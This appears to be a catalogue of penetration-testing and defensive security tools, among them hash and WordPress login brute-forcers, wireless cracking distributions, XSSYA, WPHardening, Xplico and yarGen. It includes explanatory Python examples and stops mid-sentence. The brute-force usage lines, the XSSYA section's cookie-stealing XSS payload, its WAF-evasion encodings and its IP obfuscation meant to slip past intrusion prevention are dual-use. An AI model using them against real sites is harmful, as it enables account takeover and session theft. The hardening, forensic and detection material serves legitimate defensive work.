Here you can download Woodpecker hash Bruteforce for Windows and Mac OS.
How to use:
1. Open cmd.exe on Windows or Terminal on Mac OS
2. Drag the downloaded file into the terminal
3. Hit space (if it wasn't added automatically after the filename) and type --help
4. Some help will be shown to you
5. You may want to run the examples first
6. Start bruteforcing!
Supported hash types:
MD2     32 characters
MD4     32 characters
MD5     32 characters
SHA1    40 characters
SHA224  56 characters
SHA256  64 characters
SHA384  96 characters
SHA512  128 characters
Supported bruteforce types:
Dummy: using letter combinations of letters of the given alphabet
Random: using random letter combinations of letters of the given alphabet (use if other types do not succeed)
Wordlist-based: using words from the given wordlist
News

22.02.2015 - Version 0.9.1 is here!
1. Ability to start program by double-clicking it (beta)
2. Bug fixes, stability and speed improvements
20.02.2015 - Version 0.9 is out!
1. Finally, Woodpecker hash Bruteforce is now multithreaded on both Windows and Mac OS!
2. Bug fixes, stability, speed and interface improvements
8.02.2015 - Version 0.8 is out!
1. Ability to start interrupted session using '-R' flag
2. New bruteforce type - random bruteforce using '-r' flag
3. Results are now saved in case of sudden termination
4. Bug fixes, stability, speed and interface improvements
16.01.2015 - Version 0.7 published!
1. Bug fixes and stability improvements (fixed the alphabet bug on Windows)
2. Slight speed and logic improvements
28.12.2014 - Added video tutorial in the bottom of the "Tutorial" page
7.12.2014 - Version 0.6 published!
1. Now works better with dictionaries and wordlists
2. You can supply your own alphabet
3. Now you are able to save results

Download Woodpecker hash Bruteforce


WORDBRUTEPRESS - WORDPRESS BRUTE FORCE
MULTITHREADING WITH STANDARD AND XML-RPC
LOGIN METHOD

Wordpress Brute Force Multithreading with standard and xmlrpc login method written in python.
Features:

1. Multithreading
2. xml-rpc brute force mode
3. http and https protocols support
4. Random User Agent
5. Big wordlist support

Usage:
Standard login request:
python wordbrutepress.py -S -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]
Xml-rpc login request:
python wordbrutepress.py -X -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]

CHANGELOG
2015-11-20 v2.1
1) Add new feature: Big wordlist support (thanks to guly @theguly)
2) Fix faultcode check instead of "403" code for XML-RPC (thanks to guly @theguly)
2015-04-12 v2.0
1) Add new feature: xml-rpc brute force mode
2) Fix minor bugs
2015-04-11 v1.1
1) optparse (Deprecated since version 2.7) replaced by argparse
2) Fix connection bugs

Download Wordbrutepress
WPHARDENING 1.5 - FORTIFY THE SECURITY OF ANY
WORDPRESS INSTALLATION

Fortify the security of any WordPress installation.

Installation

Installing WPHardening requires you to execute one console command:
$ pip install -r requirements.txt

Usage
$ python wphardening.py -h

Fortify the security of any WordPress installation.

Sponsored by SYHUNT - http://www.syhunt.com


Usage: python wphardening.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v, --verbose         Active verbose mode output results
  --update              Check for WPHardening latest stable version

  Target:
    This option must be specified to modify the package WordPress.

    -d DIRECTORY, --dir=DIRECTORY
                        **REQUIRED** - Working Directory.
    --load-conf=FILE    Load file configuration.

  Hardening:
    Different tools to hardening WordPress.

    -c, --chmod         Chmod 755 in directory and 644 in files.
    -r, --remove        Remove files and directory.
    -b, --robots        Create file robots.txt
    -f, --fingerprinting
                        Deleted fingerprinting WordPress.
    -t, --timthumb      Find the library TimThumb.
    --chown=user:group  Changing file and directory owner.
    --wp-config         Wizard generated wp-config.php
    --plugins           Download Plugins Security.
    --proxy=PROXY       Use a HTTP proxy to connect to the target url for --plugins and --wp-config.
    --indexes           It allows you to display the contents of directories.
    --minify            Compressing static file .css and .js
    --malware-scan      Malware Scan in WordPress project.

  Miscellaneous:
    -o FILE, --output=FILE
                        Write log report to FILE.log

Examples

Check a WordPress Project

Before using the tool, we must ensure that our working directory is a WordPress installation.
$ python wphardening.py -d /home/path/to/wordpress -v

Change permissions

This option adds the correct permissions to files and directories.
$ python wphardening.py -d /home/path/to/wordpress --chmod -v
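An audit of the 755/644 rule that --chmod applies, added here as an example and not WPHardening's own code: it lists every entry that grants more than the policy allows, leaves tighter modes (such as a 600 wp-config.php) untouched instead of loosening them, and only changes modes on disk when dry_run is switched off. The sample tree is constructed.

```python
import os
import stat
from dataclasses import dataclass

# The policy that WPHardening's --chmod applies: 755 on directories, 644 on files.
DIR_MODE = 0o755
FILE_MODE = 0o644


@dataclass
class Entry:
    path: str       # relative to the WordPress root
    is_dir: bool
    mode: int       # permission bits only (st_mode & 0o777)


def collect_entries(root):
    """Walk a WordPress tree and record every directory and regular file with its mode.
    Symlinks are skipped: chmod would follow them to a target outside the tree."""
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue
            entries.append(Entry(os.path.relpath(full, root),
                                 stat.S_ISDIR(st.st_mode), stat.S_IMODE(st.st_mode)))
    return entries


def expected_mode(entry):
    return DIR_MODE if entry.is_dir else FILE_MODE


def extra_bits(entry):
    """Permission bits granted beyond the policy; 0 means compliant. A tighter mode
    (wp-config.php at 600) is left alone: a blanket chmod 644 would loosen it."""
    return entry.mode & ~expected_mode(entry)


def problems(entry):
    """Human-readable reasons an entry violates the policy, most serious first."""
    extra = extra_bits(entry)
    reasons = []
    if extra & stat.S_IWOTH:
        reasons.append("world-writable")
    if extra & stat.S_IWGRP:
        reasons.append("group-writable")
    if not entry.is_dir and extra & 0o111:
        reasons.append("executable file")
    if extra and not reasons:
        reasons.append(f"extra bits {extra:o}")
    return reasons


def audit(entries):
    """(path, current mode, corrected mode, reasons) for every non-compliant entry.
    The corrected mode keeps only the bits the policy allows."""
    return [(e.path, e.mode, e.mode & expected_mode(e), problems(e))
            for e in entries if extra_bits(e)]


def enforce(root, dry_run=True):
    """Audit a real tree and, unless dry_run, chmod each finding to its corrected mode."""
    findings = audit(collect_entries(root))
    if not dry_run:
        for path, _, corrected, _ in findings:
            os.chmod(os.path.join(root, path), corrected)
    return findings


# Constructed snapshot of a neglected install (not read from disk): an uploads directory
# left wide open, a stray PHP file marked executable, and a deliberately tightened wp-config.php.
SAMPLE = [
    Entry("index.php", False, 0o644),
    Entry("wp-includes", True, 0o755),
    Entry("wp-content/uploads", True, 0o777),
    Entry("wp-content/uploads/stray.php", False, 0o755),
    Entry("wp-content/uploads/notes.txt", False, 0o666),
    Entry("wp-config.php", False, 0o600),
]

if __name__ == "__main__":
    for path, current, corrected, reasons in audit(SAMPLE):
        print(f"{path}: {current:o} -> {corrected:o} ({', '.join(reasons)})")
```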

Remove files that are not used

Part of the fortification of any system is to remove those files, directories or components that are not required.
$ python wphardening.py -d /home/path/to/wordpress --remove -v

Create your robots.txt file

WordPress by default does not include a robots.txt file; with this option we can customize our robots.txt.
$ python wphardening.py -d /home/path/to/wordpress --robots -v

For more information robots.txt

Remove all fingerprinting and Version

$ python wphardening.py -d /home/path/to/wordpress --fingerprinting -v

Check a TimThumb library

$ python wphardening.py -d /home/path/to/wordpress --timthumb -v

Create Index file

This file is created as a way to prevent browsing of a directory's contents.
$ python wphardening.py -d /home/path/to/wordpress --indexes -v

Download Plugins security

The following is a list of the most commonly used security plugins that you can download automatically:
AntiVirus
Bad Behavior
Block Bad Queries
Exploit Scanner
Latch
Simple History
Stream
WP Security Scan
WP-DBManager
$ python wphardening.py -d /home/path/to/wordpress --plugins

Wizard generated wp-config.php

This command automatically creates a file called wp-config-wphardening.php which you can then rename.
$ python wphardening.py -d /home/path/to/wordpress --wp-config

WPHardening update

With this option you can always have the latest version of WPHardening.
$ python wphardening.py --update

Use all options

$ python wphardening.py -d /home/path/to/wordpress -c -r -f -t --wp-config --indexes --plugins -o /home/user/wphardening.log

Download WPHardening 1.5


WS-ATTACKER - MODULAR FRAMEWORK FOR WEB
SERVICES PENETRATION TESTING

XML-based SOAP Web Services are a widely used technology, which allows the users to execute remote operations and transport arbitrary data. It is currently adapted in Service Oriented Architectures, cloud interfaces, management of federated identities, eGovernment, or military services. The wide adoption of this technology has resulted in an emergence of numerous - mostly complex - extension specifications. Naturally, this has been followed by a rise in a large number of Web Services attacks.
By implementing common web applications, the developers evaluate the security of their systems by applying different penetration testing tools. However, in comparison to the well-known attacks such as SQL injection or Cross Site Scripting, there exist no penetration testing tools for Web Services specific attacks. With WS-Attacker we intend to close this gap and provide developers and penetration testers automatic methods for detecting Web Services specific attacks. The tool currently supports the following attacks:
SOAPAction Spoofing
WS-Addressing Spoofing
Various XML Denial of Service variants
XML Signature Wrapping

Download WS-Attacker
XIAOPAN OS - PENTESTING DISTRIBUTION FOR
WIRELESS SECURITY ENTHUSIASTS

Xiaopan OS is an easy to use software package for beginners and experts that includes a number of advanced tools to penetrate wireless networks. Based on the Tiny Core Linux (TCL) operating system (OS), it has a slick graphical user interface (GUI) requiring no need for typing Linux commands. Xiaopan OS is Windows, Mac and Linux compatible and users can simply install and boot this ~70mb OS through a USB pen drive or in a virtual machine (VM) environment.

Alternatives

There are a number of professional operating systems that have been developed specifically for pentesting and security auditing, all of which are based on Linux. These include Kali, BackTrack and WiFiway. What sets Xiaopan OS apart from its competitors is that Xiaopan OS is simple to use and just works, depending on a number of variables and providing you have all the right hardware of course.
Tools

Xiaopan OS includes a number of tools to hack WiFi Protected Setup (WPS), WiFi Protected Access (WPA) and Wired Equivalent Privacy (WEP) encrypted networks:

Reaver: newly developed application with the ability to brute force crack WPS (WPA / WPA2) pins.
Inflator: this is the GUI version of command line reaver.
Aircrack-ng: the major backbone of many other Xiaopan tools including FeedingBottle (FB) and Minidwep with the ability to attack WPA networks through a dictionary attack and WEP networks through collecting and injecting packets.
FeedingBottle: so easy a baby could use it! FB is essentially the Aircrack-ng GUI and was created by Beini.
Minidwep: is similar to FB but has a better and similar GUI that is even easier to use than FB. The added advantage of Minidwep is that you can also run Reaver and Inflator from here as well.
Xfe: this is a simple file manager similar to say Windows Explorer

Download Xiaopan OS
XPL-SEARCH - SEARCH EXPLOITS IN MULTIPLE EXPLOIT
DATABASES

XPL SEARCH
Search exploits in multiple exploit databases!
Exploit databases available:
* Exploit-DB
* MIlw0rm
* PacketStormSecurity
* IntelligentExploit
* IEDB
* CVE

TO RUN THE SCRIPT

PHP Version (cli)   5.5.8 or higher     php5-cli    Lib
cURL support        Enabled             php5-curl   Lib
cURL Version        7.40.0 or higher
allow_url_fopen     On
Permission          Writing & Reading

ABOUT DEVELOPER

Author_Nick   CoderPIRATA
Author_Name   Eduardo
Email         coderpirata@gmail.com
Blog          http://coderpirata.blogspot.com.br/
Twitter       https://twitter.com/coderpirata
Google+       https://plus.google.com/103146866540699363823
Pastebin      http://pastebin.com/u/CoderPirata
Github        https://github.com/coderpirata/

"CHANGELOG"
0.1 - [02/07/2015]
- Started.
0.2 - [12/07/2015]
- Added Exploit-DB.
- Added Colors, only for linux!
- Added Update Function.
- "Generator" of User-Agent reworked.
- Small errors and adaptations.
0.3 - [22/07/2015]
- Bugs solved.
- Added "save" Function.
- Added "set-db" function.
0.4 - [05/08/2015]
- Save function modified.
- Added Scan with list.
0.5 - [29/08/2015]
- Added search by Author.
0.6 - [09/09/2015]
- Now displays the author of the exploit.
* Does not work with IntelligentExploit.
- Changes in search logs.
0.7 - [11/09/2015]
- Added search in CVE.
* ID.
* Simple search - id 6.
- Bug in exploit-db search, "papers" fixed.
- Added standard time of 60 seconds for each request.
- file_get_contents() was removed from "browser()".
- Code of milw00rm search has been modified.
- Changes in search logs.
- Added date.
0.7.1 - [17/09/2015]
- Bug in milw00rm solved
0.8 - [05/10/2015]
- Added shebang.
- Commands "save", "save-log" and "save-dir" have been
modified.
- Added "no-db" option.
- GETOPT() modified - Thanks Jack2.
- Bug on save-dir solved.
- Others minor bugs solved.

Screenshot

Download XPL-SEARCH
XPLICO V1.1.1 - OPEN SOURCE NETWORK FORENSIC
ANALYSIS TOOL (NFAT)

The goal of Xplico is to extract from an internet traffic capture the application data it contains.
For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. Xplico isn't a network protocol analyzer. Xplico is an open source Network Forensic Analysis Tool (NFAT).
Features

Protocols supported: HTTP, SIP, IMAP, POP, SMTP, TCP, UDP, IPv6, ...;
Port Independent Protocol Identification (PIPI) for each application protocol;
Multithreading;
Output data and information in SQLite database or Mysql database and/or files;
Each piece of data reassembled by Xplico is associated with an XML file that uniquely identifies the flows and the pcap containing the reassembled data;
Realtime elaboration (depends on the number of flows, the types of protocols and on the performance of the computer - RAM, CPU, HD access time, ...);
TCP reassembly with ACK verification for any packet or soft ACK verification;
Reverse DNS lookup from DNS packets contained in the input files (pcap), not from an external DNS server;
No size limit on data entry or the number of input files (the only limit is HD size);
IPv4 and IPv6 support;
Modularity. Each Xplico component is modular. The input interface, the protocol decoder (Dissector) and the output interface (dispatcher) are all modules;
The ability to easily create any kind of dispatcher with which to organize the extracted data in the way most appropriate and useful to you;

Download Xplico
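
The feature that distinguishes Xplico from a port-based classifier is Port Independent Protocol Identification: the application protocol is recognised from the payload, not from the TCP port. The following is an added example, not Xplico code, that shows the idea in Python over a pcap constructed in the script (Ethernet/IPv4/TCP framing, HTTP on port 8088 and SMTP on port 80). The signature table, the flow key and the helper names are this example's own assumptions.

```python
# Added example (not Xplico code): port-independent protocol
# identification over a constructed pcap, in the spirit of Xplico's
# PIPI feature. Stdlib only; runs offline.
import struct

# Payload signatures, checked regardless of the TCP port in use.
# The names and patterns are this example's own assumptions.
SIGNATURES = [
    ("HTTP", lambda p: p.split(b" ", 1)[0] in (b"GET", b"POST", b"HEAD", b"PUT") and b" HTTP/1." in p),
    ("HTTP", lambda p: p.startswith(b"HTTP/1.")),
    ("SMTP", lambda p: p.startswith((b"220 ", b"EHLO ", b"HELO ", b"MAIL FROM:"))),
    ("POP3", lambda p: p.startswith((b"+OK", b"USER ", b"PASS "))),
    ("SIP",  lambda p: b"SIP/2.0" in p.split(b"\r\n", 1)[0]),
]

def identify(payload):
    """Return the application protocol name for a TCP payload, or None."""
    for name, test in SIGNATURES:
        if test(payload):
            return name
    return None

def build_pcap(packets):
    """Serialize (src, sport, dst, dport, payload) tuples into a minimal
    little-endian pcap with Ethernet/IPv4/TCP framing (constructed data)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    for src, sport, dst, dport, payload in packets:
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
        total = 20 + len(tcp) + len(payload)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, 6, 0,
                         bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
        frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out

def iter_tcp_payloads(pcap):
    """Yield (src, sport, dst, dport, payload) for each IPv4/TCP packet in a pcap."""
    endian = "<" if pcap[:4] == b"\xd4\xc3\xb2\xa1" else ">"
    pos = 24                                   # skip the pcap global header
    while pos + 16 <= len(pcap):
        _, _, caplen, _ = struct.unpack(endian + "IIII", pcap[pos:pos + 16])
        frame = pcap[pos + 16:pos + 16 + caplen]
        pos += 16 + caplen
        if frame[12:14] != b"\x08\x00":        # not IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:                         # not TCP
            continue
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        doff = (tcp[12] >> 4) * 4
        payload = tcp[doff:]
        if payload:
            yield src, sport, dst, dport, payload

def classify_pcap(pcap):
    """Map each flow (src, sport, dst, dport) to the protocol seen in its payload."""
    result = {}
    for src, sport, dst, dport, payload in iter_tcp_payloads(pcap):
        result[(src, sport, dst, dport)] = identify(payload)
    return result

# Constructed traffic: HTTP on a non-standard port and SMTP on port 80,
# which a port-based classifier would get wrong.
SAMPLE_PCAP = build_pcap([
    ("10.0.0.5", 51000, "10.0.0.9", 8088, b"GET /index.html HTTP/1.1\r\nHost: example\r\n\r\n"),
    ("10.0.0.9", 80, "10.0.0.5", 51001, b"220 mail.example ESMTP ready\r\n"),
    ("10.0.0.5", 51002, "10.0.0.9", 5060, b"INVITE sip:bob@example SIP/2.0\r\n"),
    ("10.0.0.5", 51003, "10.0.0.9", 9999, b"\x00\x01\x02binary"),
])

if __name__ == "__main__":
    for flow, proto in classify_pcap(SAMPLE_PCAP).items():
        print(flow, "->", proto)
```

Only the first packet of each flow is inspected here; Xplico reassembles the TCP stream first and dissects the reassembled data, which also matters for protocols whose banner is split across segments.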
XSSYA V2.0 - CROSS SITE SCRIPTING SCANNER &
VULNERABILITY CONFIRMATION

XSSYA is a Cross Site Scripting scanner and vulnerability confirmation
tool written in Python. It confirms an XSS vulnerability in two steps.
Method 1 sends the payload encoded, to bypass a Web Application Firewall,
and inspects the request and response; if the server responds with 200 it
moves on to Method 2, which searches the HTML code of the page for the
decoded payload. If that is confirmed, the last step executes
document.cookie to get the cookie.

What has been changed?

XSSYA v2.0 has more payloads; the library contains 41 payloads to enhance
the detection level.
The XSS scanner has been removed from XSSYA to reduce false positives.
URLs to be tested previously could not end in any character other than
(/ - = - ?); this limitation has been removed.

What's new in XSSYA V2.0?

Custom Payload: you have the ability to choose your own custom payload,
and you can encode it with different types of encoding (B64, HEX,
URL_Encode, HEX with semicolons, HTML entities for single and double
quotes only, HTML entities for brackets, or encoding the whole payload
with HTML entities). This feature also supports the XSS vulnerability
confirmation method: you choose your custom payload and custom encoding,
execute it, and if the response is 200 XSSYA checks for the same payload,
decoded, in the HTML code of the page.
HTML5 Payloads: XSSYA V2.0 contains a library of 44 HTML5 payloads.
XSSYA has a library of the applications most commonly vulnerable to XSS
(Apache, WordPress, phpMyAdmin). If you choose Apache, it gives the CVE
number, the Apache version that is affected and the link to the CVE for
more details, so it is easy to search for a certain version that is
affected by XSS.
XSSYA can convert the attacker's IP address to Hex, Dword or Octal
notation to bypass any security mechanism or IPS that may exist on the
target domain.
XSSYA checks whether the target is vulnerable to XST (Cross Site Tracing):
it sends a custom TRACE request and checks whether the target domain
reflects it. The request looks like this:
TRACE / HTTP/1.0
Host: demo.testfire.net
Header1: < script >alert(document.cookie);

XSSYA Features

* Supports HTTPS
* After confirmation, executes the payload to get cookies
* Runs on Windows and Linux
* Identifies 3 types of WAF (Mod_Security - WebKnight - F5 BIG-IP)
* Contains a library of encoded payloads to bypass a WAF (Web Application
Firewall)
* Supports saving the web page's HTML code before executing the payload,
and viewing the HTML code on screen or in the terminal
More details:
http://labs.dts-solution.com/xssya-forget-the-browser-for-xssby-yehia-mamdouh/

Download XSSYA v2.0
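
The three mechanisms described above (the encodings applied to a custom payload, the two-step confirmation, and the Hex/Dword/Octal IP notations) are shown below as an added example in Python. It is not XSSYA's own code: the encoding names, the sample payload, and the two constructed responses (one that reflects the payload unescaped, one that HTML-escaped it) are this example's own assumptions, and nothing is sent over the network.

```python
# Added example (not XSSYA's code): the encodings XSSYA offers for a
# custom payload, the two-step confirmation (200 response, then the
# decoded payload present in the HTML) run over constructed responses,
# and the Hex/Dword/Octal IP notations. Stdlib only; runs offline.
import base64
import html
import urllib.parse

PAYLOAD = '<script>alert(document.cookie)</script>'   # sample payload (assumption)

def encode_payload(payload, method):
    """Encode a payload the way a WAF-evasion mode might send it."""
    if method == "B64":
        return base64.b64encode(payload.encode()).decode()
    if method == "HEX":
        return payload.encode().hex()
    if method == "URL":
        return urllib.parse.quote(payload, safe="")
    if method == "HEX_SEMI":          # hex HTML entities: &#x3c;...
        return "".join(f"&#x{ord(c):x};" for c in payload)
    if method == "ENTITY_QUOTES":     # only ' and " become entities
        return payload.replace('"', "&quot;").replace("'", "&#x27;")
    if method == "ENTITY_BRACKETS":   # only < and > become entities
        return payload.replace("<", "&lt;").replace(">", "&gt;")
    if method == "ENTITY_ALL":
        return html.escape(payload, quote=True)
    raise ValueError(f"unknown encoding {method}")

def decode_payload(encoded, method):
    """Reverse encode_payload: what the server or browser ends up seeing."""
    if method == "B64":
        return base64.b64decode(encoded).decode()
    if method == "HEX":
        return bytes.fromhex(encoded).decode()
    if method == "URL":
        return urllib.parse.unquote(encoded)
    return html.unescape(encoded)     # every entity variant decodes this way

def confirm_xss(status, body, payload):
    """Method 1: the status must be 200. Method 2: the *decoded* payload
    must appear verbatim in the HTML, i.e. the server reflected it unescaped."""
    if status != 200:
        return False
    return payload in body

def ip_notations(ip):
    """Return the Dword, Hex and Octal forms of a dotted-quad IPv4 address,
    which browsers and many URL parsers accept in place of 1.2.3.4."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError("not a dotted-quad IPv4 address")
    dword = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]
    return {
        "dword": str(dword),
        "hex": "0x%08x" % dword,
        "octal": ".".join("0%o" % o for o in octets),
    }

# Constructed responses: one reflects the decoded payload, one escaped it.
REFLECTED = (200, '<p>Search results for <script>alert(document.cookie)</script></p>')
ESCAPED = (200, '<p>Search results for &lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>')

if __name__ == "__main__":
    for method in ("B64", "HEX", "URL", "HEX_SEMI", "ENTITY_ALL"):
        print(method, encode_payload(PAYLOAD, method))
    print("reflected:", confirm_xss(*REFLECTED, PAYLOAD), "escaped:", confirm_xss(*ESCAPED, PAYLOAD))
    print(ip_notations("192.168.1.1"))
```

A 200 response on its own proves nothing, which is why the second step matters: the escaped response above also returns 200 but is not exploitable, and the decoded payload is exactly what must be searched for, since the server may have decoded the entity or URL encoding before echoing the input.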
YARGEN - A GENERATOR FOR YARA RULES (FOR
MALWARE RESEARCHERS)

yarGen is a generator for YARA rules.

What does yarGen do?

The main principle is the creation of YARA rules from strings found in
malware files while removing all strings that also appear in goodware
files.
Since version 0.14.0 it uses the naive-bayes-classifier by Mustafa Atik
and Nejdet Yucesoy in order to classify the strings and detect useful
words instead of compression/encryption garbage.
Since version 0.12.0 yarGen does not completely remove the goodware
strings from the analysis process but includes them with a very low
score. These strings are used in a rule only if no better strings can be
found, and such a rule is marked with the comment /* Goodware rule */.
Force yarGen to remove all goodware strings with --excludegood. Also
since version 0.12.0 yarGen allows you to place the "strings.xml" from
PEstudio in the program directory in order to apply its blacklist
definition during the string analysis process; you'll get better results.
The rule generation process tries to identify similarities between the
files that get analyzed and then combines the strings into so-called
"super rules". Up to now the super rule generation does not remove the
simple rule for the files that have been combined in a single super rule,
so there is some redundancy when super rules are created. You can
suppress the simple rule for a file that is already covered by a super
rule by using --nosimple.
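
The principle described above, as an added example in Python that is not yarGen's own code: printable strings are pulled from a sample constructed in the script, strings that also occur in a constructed goodware set are kept but scored very low rather than dropped, the highest-scoring strings are selected, and a rule with the magic-header and filesize conditions is rendered. The scoring heuristics, the sample, the goodware set and the helper names are this example's own assumptions, not yarGen's scoring.

```python
# Added example (not yarGen's code): the core idea behind yarGen reduced
# to its essentials. Scoring heuristics are this example's own.
import re

PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")   # ASCII runs of at least 6 bytes

def extract_strings(data, min_len=6, max_len=128):
    """Return unique printable ASCII strings of min_len..max_len bytes."""
    seen = []
    for m in PRINTABLE.finditer(data):
        s = m.group().decode("ascii")
        if min_len <= len(s) <= max_len and s not in seen:
            seen.append(s)
    return seen

def score_string(s, goodware):
    """Higher is more useful for detection. Goodware strings survive with
    a very low score so they are only used when nothing better exists."""
    if s in goodware:
        return -100
    score = min(len(s), 40) // 4                   # longer is better, capped
    if re.search(r"[\\/]", s):                     # paths and URLs
        score += 5
    if re.search(r"[A-Za-z]{4,}", s) is None:      # no real word: likely garbage
        score -= 10
    if len(set(s)) < len(s) / 3:                   # low-entropy padding
        score -= 5
    return score

def select_strings(data, goodware, max_strings=20, min_score=5):
    """Score and rank the sample's strings, keeping at most max_strings.
    Falls back to goodware strings (negative score) if nothing qualifies."""
    scored = sorted(((score_string(s, goodware), s) for s in extract_strings(data)),
                    key=lambda t: (-t[0], t[1]))
    good = [(sc, s) for sc, s in scored if sc >= min_score]
    chosen = good if good else scored
    return chosen[:max_strings]

def render_rule(name, data, goodware, filesize_multiplier=5, show_score=False):
    """Render a YARA rule: selected strings, MZ magic header and a filesize
    bound of multiplier * sample size (the role of yarGen's -fm option).
    Returns (rule_text, selected_strings)."""
    chosen = select_strings(data, goodware)
    goodware_rule = all(sc < 0 for sc, _ in chosen)
    lines = [f"rule {name} {{"]
    if goodware_rule:
        lines.append("    /* Goodware rule */")
    lines.append("    strings:")
    for i, (sc, s) in enumerate(chosen, 1):
        esc = s.replace("\\", "\\\\").replace('"', '\\"')
        comment = f" /* score: {sc} */" if show_score else ""
        lines.append(f'        $s{i} = "{esc}"{comment}')
    lines.append("    condition:")
    lines.append(f"        uint16(0) == 0x5a4d and filesize < {len(data) * filesize_multiplier}"
                 f" and {min(3, len(chosen))} of them")
    lines.append("}")
    return "\n".join(lines), [s for _, s in chosen]

# Constructed inputs: a fake PE-like blob and a goodware string set.
GOODWARE = {"KERNEL32.dll", "GetProcAddress", "LoadLibraryA",
            "This program cannot be run in DOS mode."}
SAMPLE = (b"MZ\x90\x00" + b"This program cannot be run in DOS mode." + b"\x00" * 16
          + b"KERNEL32.dll\x00GetProcAddress\x00LoadLibraryA\x00"
          + b"C:\\Users\\dev\\evil\\build\\dropper.pdb\x00"
          + b"http://c2.example.invalid/gate.php\x00"
          + b"AAAAAAAAAAAAAAAAAAAAAAAA\x00"
          + b"x9Q2!kL#pZ\x00"
          + b"Mozilla/5.0 (compatible; Updater)\x00")

if __name__ == "__main__":
    print(render_rule("dropper_example", SAMPLE, GOODWARE, show_score=True)[0])
```

Run stand-alone it prints a rule built from the PDB path, the C2 URL and the user-agent string, while the import names, the DOS stub text, the padding and the random-looking token are dropped; a sample consisting only of goodware strings still yields a rule, but a low-confidence one marked as such.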
Installation

1. Make sure you have at least 2GB of RAM on the machine you plan to use
yarGen on
2. Clone the git repository
3. Install all dependencies with sudo pip install pickle scandir lxml
naiveBayesClassifier
4. Unzip the goodware database (e.g. 7z x goodstrings.db.zip.001)
5. See help with python yarGen.py --help

Memory Requirements
Warning: yarGen pulls the whole goodstring database into memory and uses
up to 2 GB of memory for a few seconds.

Command Line Parameters

usage: yarGen.py [-h] [-m M] [-g G] [-u] [-c] [-o output_rule_file]
                 [-p prefix] [-a author] [-r ref] [-l min-size] [-z min-score]
                 [-s max-size] [-rc maxstrings] [-nr] [-oe] [-fs size-in-MB]
                 [--score] [--inverse] [--nodirname] [--noscorefilter]
                 [--excludegood] [--nosimple] [--nomagic] [--nofilesize]
                 [-fm FM] [--noglobal] [--nosuper] [--debug]

yarGen

optional arguments:
-h, --help            show this help message and exit
-m M                  Path to scan for malware
-g G                  Path to scan for goodware (don't use the database
                      shipped with yarGen)
-u                    Update local goodware database (use with -g)
-c                    Create new local goodware database (use with -g)
-o output_rule_file   Output rule file
-p prefix             Prefix for the rule description
-a author             Author name
-r ref                Reference
-l min-size           Minimum string length to consider (default=8)
-z min-score          Minimum score to consider (default=5)
-s max-size           Maximum string length to consider (default=128)
-rc maxstrings        Maximum number of strings per rule (default=20,
                      intelligent filtering will be applied)
-nr                   Do not recursively scan directories
-oe                   Only scan executable extensions EXE, DLL, ASP, JSP,
                      PHP, BIN, INFECTED
-fs size-in-MB        Max file size in MB to analyze (default=3)
--score               Show the string scores as comments in the rules
--inverse             Create inverse rules (see "Inverse rule creation"
                      below)
--nodirname           Don't use the folder name variable in inverse rules
--noscorefilter       Don't filter strings based on score (default in
                      'inverse' mode)
--excludegood         Force the exclusion of all goodware strings
--nosimple            Skip simple rule creation for files included in
                      super rules
--nomagic             Don't include the magic header condition statement
--nofilesize          Don't include the filesize condition statement
-fm FM                Multiplier for the maximum 'filesize' condition
                      (default: 5)
--noglobal            Don't create global rules
--nosuper             Don't try to create super rules that match against
                      various files
--debug               Debug output

Best Practice

See the following blog post for a more detailed description of how to
use yarGen for YARA rule creation: How to Write Simple but Sound Yara
Rules

Examples

Use the shipped database (FAST) to create some rules
python yarGen.py -m X:\MAL\Case1401
Use the shipped database of goodware strings and scan the malware
directory "X:\MAL\Case1401" recursively. Rules are created for all files
in this directory and below. A file named 'yargen_rules.yar' will be
generated in the current directory.

Show the score of the strings as comments
yarGen will by default use the top 20 strings based on their score. To
see how a certain string in the rule scored, use the "--score"
parameter.
python yarGen.py --score -m X:\MAL\Case1401

Use only strings with a certain minimum score
In order to use only strings that reach a certain minimum score in your
rules, use the "-z" parameter. It is good practice to first create rules
with "--score" and then perform a second run with a minimum score set for
your sample set via "-z".
python yarGen.py --score -z 5 -m X:\MAL\Case1401

Preset author and reference
python yarGen.py -a "Florian Roth" -r "http://goo.gl/c2qgFx" -m /opt/mal/case_441 -o case441.yar

Exclude strings from goodware samples
python yarGen.py --excludegood -m /opt/mal/case_441

Suppress simple rules if already covered by a super rule
python yarGen.py --nosimple -m /opt/mal/case_441

Show debugging output
python yarGen.py --debug -m /opt/mal/case_441

Create a new goodware strings database
python yarGen.py -c -g C:\Windows\System32

Update the goodware strings database (append new strings to the old
ones)
python yarGen.py -u -g "C:\Program Files"

Inverse rule creation (still beta)

In order to create inverse rules on goodware, you have to prepare a
directory with subdirectories in which you include all versions of the
files you want to create inverse rules for, with their original names
and in their original folders. If that sounds strange, here is an
example.
E.g. to create inverse rules for all Windows executables in the System32
folder, you have to create a goodware archive with the following
directory structure:
G:\goodware
    WindowsXP
        System32 - all files
    Windows2003
        System32 - all files
    Windows2008R2
        System32 - all files
yarGen then creates rules that identify e.g. the file name "cmd.exe" in
a path ending with "System32" and check whether the file contains
